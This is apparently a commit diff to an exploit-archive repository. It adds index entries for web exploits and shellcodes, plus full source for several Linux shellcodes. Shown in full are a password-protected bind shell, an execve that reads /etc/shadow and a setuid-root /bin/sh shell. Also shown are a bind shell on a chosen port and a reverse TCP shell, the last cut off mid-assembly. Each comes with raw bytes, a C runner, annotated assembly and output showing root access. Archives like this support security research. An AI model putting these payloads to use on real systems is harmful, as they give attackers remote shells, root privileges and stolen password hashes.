50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Directory Traversal",1970-01-01,BitTheByte,webapps,aspx,
50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php, 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php,
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java, 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java,
50244,exploits/php/webapps/50244.py,"Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php, 50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php,
50248,exploits/php/webapps/50248.txt,"Dolibarr ERP 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php, 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php,
50250,exploits/hardware/webapps/50250.txt,"Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)",1970-01-01,icekam,webapps,hardware,
50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware, 50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware,
50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware, 50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware,
50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware, 50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware,
@ -44387,7 +44468,9 @@ id,file,description,date,author,type,platform,port
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - Arbitrary File Upload",1970-01-01,"Okan Kurtulus",webapps,php,
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, 50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,

Can't render this file because it is too large.

12
files_shellcodes.csv
View file

@ -1025,9 +1025,21 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",1970-01-01,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",1970-01-01,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux 49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86 49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",1970-01-01,"Artur Szymczak",shellcode,linux_x86
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86

1 id file description date author type platform
1025 48592 shellcodes/linux_x86/48592.c Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode linux_x86
1026 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 1970-01-01 danf42 shellcode linux_x86
1027 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 1970-01-01 Siddharth Sharma shellcode windows_x86
1028 49466 shellcodes/windows_x86/49466.asm Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) 1970-01-01 Armando Huesca Prida shellcode windows_x86
1029 49472 shellcodes/linux/49472.c Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) 1970-01-01 Guillem Alminyana shellcode linux
1030 49547 shellcodes/linux_x86-64/49547.c Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) 1970-01-01 Felipe Winsnes shellcode linux_x86-64
1031 49592 shellcodes/windows_x86/49592.asm Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) 1970-01-01 Armando Huesca Prida shellcode windows_x86
1032 49756 shellcodes/linux/49756.asm Linux/x64 - /sbin/halt -p Shellcode (51 bytes) 1970-01-01 Chenthur Velan shellcode linux
1033 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 1970-01-01 s1ege shellcode linux_x86
1034 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 1970-01-01 s1ege shellcode linux_x86-64
1035 49819 shellcodes/windows_x86-64/49819.c Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) 1970-01-01 boku shellcode windows_x86-64
1036 49820 shellcodes/windows_x86-64/49820.c Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) 1970-01-01 boku shellcode windows_x86-64
1037 49855 shellcodes/linux_x86/49855.c Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) 1970-01-01 Artur Szymczak shellcode linux_x86
1038 49976 shellcodes/linux_x86/49976.c Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) 1970-01-01 d7x shellcode linux_x86
1039 50124 shellcodes/linux_x86/50124.c Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) 1970-01-01 d7x shellcode linux_x86
1040 50125 shellcodes/linux_x86/50125.c Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) 1970-01-01 d7x shellcode linux_x86
1041 50141 shellcodes/linux_x86/50141.c Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode 1970-01-01 d7x shellcode linux_x86
1042 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64
1043 50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1044 50369 shellcodes/windows_x86/50369.c Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1045 50384 shellcodes/windows_x86/50384.c Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86

107
shellcodes/linux/49472.c Normal file
View file

@ -0,0 +1,107 @@
/*
Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================
Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
"\x0f\x05";
void main()
{
printf("ShellCode Lenght: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/*
ASM
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 48 31 d2 xor rdx,rdx
c: 0f 05 syscall
e: 50 push rax
f: 5f pop rdi
10: 52 push rdx
11: 52 push rdx
12: 66 68 11 5c pushw 0x5c11
16: 66 6a 02 pushw 0x2
19: 6a 31 push 0x31
1b: 58 pop rax
1c: 54 push rsp
1d: 5e pop rsi
1e: b2 10 mov dl,0x10
20: 0f 05 syscall
22: 6a 32 push 0x32
24: 58 pop rax
25: 6a 02 push 0x2
27: 5e pop rsi
28: 0f 05 syscall
2a: 6a 2b push 0x2b
2c: 58 pop rax
2d: 48 31 f6 xor rsi,rsi
30: 99 cdq
31: 0f 05 syscall
33: 50 push rax
34: 5f pop rdi
35: 6a 02 push 0x2
37: 5e pop rsi
38: 6a 21 push 0x21
3a: 58 pop rax
3b: 0f 05 syscall
3d: 48 ff ce dec rsi
40: 79 f6 jns 38 <loop_1>
42: 6a 01 push 0x1
44: 58 pop rax
45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
4c: 64 3a 20
4f: 41 51 push r9
51: 48 89 e6 mov rsi,rsp
54: 6a 08 push 0x8
56: 5a pop rdx
57: 0f 05 syscall
59: 48 31 c0 xor rax,rax
5c: 48 83 c6 08 add rsi,0x8
60: 0f 05 syscall
62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
69: 36 37 38
6c: 56 push rsi
6d: 5f pop rdi
6e: 48 af scas rax,QWORD PTR es:[rdi]
70: 75 1c jne 8e <exit_program>
72: 48 31 c0 xor rax,rax
75: 50 push rax
76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
7d: 2f 73 68
80: 53 push rbx
81: 54 push rsp
82: 5f pop rdi
83: 50 push rax
84: 54 push rsp
85: 5a pop rdx
86: 57 push rdi
87: 54 push rsp
88: 5e pop rsi
89: 6a 3b push 0x3b
8b: 58 pop rax
8c: 0f 05 syscall
*/

63
shellcodes/linux_x86-64/49547.c Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
# Date: 02-08-2021
# Author: Felipe Winsnes
# Tested on: Debian x64
# Shellcode Length: 66
/*
global _start
_start:
xor rax, rax ; Zeroes out RAX.
xor rbp, rbp ; Zeroes out RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
push rbp ; Pushes the vaueof RBP into the Stack.
mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
push rbp ; Pushes the vaue of RBP into the Stack.
mov rbp, rsp ; Copies the value of the Stack into RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
push rbx ; Pushes the vaue of RBX into the Stack.
mov rbx, rsp ; Copies the value of the Stack into RBX.
mov rdi, rsp ; Copies the value of the Stack into RDI.
push rax ; Pushes RAX's NULL-DWORD.
mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
push rbp ; Pushes the vaue of RBP into the Stack.
push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
mov rsi, rsp ; Copies this entire string from the Stack into RSI.
push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
pop ax ; Pops this value into AX so there are no NULLs.
syscall ; The syscall is executed.
*/
/*
Usage:
whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}

41
shellcodes/linux_x86/49855.c Normal file
View file

@ -0,0 +1,41 @@
/*
Author: Artur [ajes] Szymczak (2021)
Function: Linux x86 shellcode, setreuid to 0 and then execute /bin/sh
Size: 29 bytes
Testing:
$ gcc -fno-stack-protector -z execstack shellcode_tester.c -o shellcode
shellcode_tester.c: In function main:
shellcode_tester.c:25:2: warning: incompatible implicit declaration of built-in function printf [enabled by default]
shellcode_tester.c:25:24: warning: incompatible implicit declaration of built-in function strlen [enabled by default]
$ sudo chown root:root ./shellcode
$ sudo chmod u+s ./shellcode
$ ./shellcode
Length: 29
# id
uid=0(root) gid=1000(artur) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(artur)
*/
char shellcode[] = ""
"\x31\xc0" // clear eax, as we don't know its state
"\xb0\x46" // syscall setreuid
"\x31\xdb" // real user ID = 0
"\x31\xc9" // effective user ID = 0
"\x99" // saved set-user-ID = 0 (using EDX)
"\xcd\x80" // call it
"\x96" // clear eax, as we don't know its state after former syscall
"\xb0\x0b" // syscall execve
"\x53" // NULL string terminator
"\x68\x2f\x2f\x73\x68" // //sh
"\x68\x2f\x62\x69\x6e" // /bin
"\x89\xe3" // pointer to above string - path to the program to execve
"\xcd\x80"; // call it
void main(void)
{
printf("Length: %d\n",strlen(shellcode));
((void(*)(void))shellcode)();
}

195
shellcodes/linux_x86/50124.c Normal file
View file

@ -0,0 +1,195 @@
# Exploit Title: Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
# Date: 08/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Bind Shell (/bin/sh) with dynamic port binding Null-Free Shellcode (102 bytes)
Usage: gcc -z execstack -o bindshell bindshell.c
./bindshell 7000
Binding to 7000 (0x1b58)
netstat -antlp | grep 7000
tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 26088/bindshell
nc -nv 127.0.0.1 7000
Connection to 127.0.0.1 7000 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x56\x89\xe1\xcd\x80\x89\xc6\x31\xc9\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf2\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80";
main(int argc, char *argv[])
{
/* Default port at 28th and 29th byte index: \x11\x5c */
// in case no port is provided the default would be used
if (argc < 2) {
printf("No port provided, 4444 (0x115c will be used)\n");
}
else
{
int port = atoi(argv[1]);
printf("Binding to %d (0x%x)\n", port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[28] = (unsigned char){p1};
shellcode[29] = (unsigned char){p2};
// printf("%x %x", shellcode[28], shellcode[29]);
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall BIND (0x02) - int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x02
; pushing arguments to the stack backwards:
; bind(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
; xor edx, edx
push edx
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_LISTEN (0x04) - int listen(int sockfd, int backlog);
mov al, 0x66
mov bl, 0x04
; pushing arguments to the stack backwards:
; listen(sockid, 0);
push edx ; push 0
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_ACCEPT (0x05) - int sock_accept = accept(sockid, 0, 0);
mov al, 0x66
mov bl, 0x05
push edx
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; dup2 (0x3f)
; 0 ; stdin
; dup2 (0x3f)
; 1 ; stdout
; dup2 (0x3f)
; 2 ; stderr
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; (0 - stdin, 1 - stdout, 2 - stderr) dup2 - __NR_dup2 63
; int dup2(int oldfd, int newfd);
; xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
; sub esp, 8 ; reserve some bytes in the stack to work with
push eax ; substituted sub esp, 8 to reduce opcode size
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
***/

174
shellcodes/linux_x86/50125.c Normal file
View file

@ -0,0 +1,174 @@
# Exploit Title: Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
# Date: 10/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
$ ./shell_reverse_tcp_shellcode 192.168.1.137 4444
Connecting to 192.168.1.236 (0xec01a8c0):4444 (0x115c)
Byte 26: c0
Byte 27: a8
Byte 28: 01
Byte 29: ec
$ nc -nlv 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.137 45219
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at 26th byte; Port at 32nd byte
main(int argc, char *argv[])
{
/* Default IP and port at 26th and 32nd byte index: \x7f\x01\x01\x01 \x11\x5c */
// in case no port is provided the default would be used
if (argc < 3) {
printf("No IP or port provided, 127.1.1.1:4444 (0x7f010101:0x115c) will be used\n");
}
else
{
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[1], &ipaddr.sin_addr.s_addr);
int port = atoi(argv[2]);
printf("Connecting to %s (0x%x):%d (0x%x)\n", argv[1], ipaddr.sin_addr.s_addr, port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[32] = (unsigned char){p1};
shellcode[33] = (unsigned char){p2};
/* 1st byte: 0xAABBCCDD >> 0 & 0xff
2nd byte: 0xAABBCCDD >> 8 & 0xff
3rd byte: 0xAABBCCDD >> 16 & 0xff
4th byte: 0xAABBCCDD >> 24 & 0xff
*/
int i, a;
for (i = 26, a = 0; i <= 29; i++, a+=8)
{
shellcode[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, shellcode[i]);
}
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
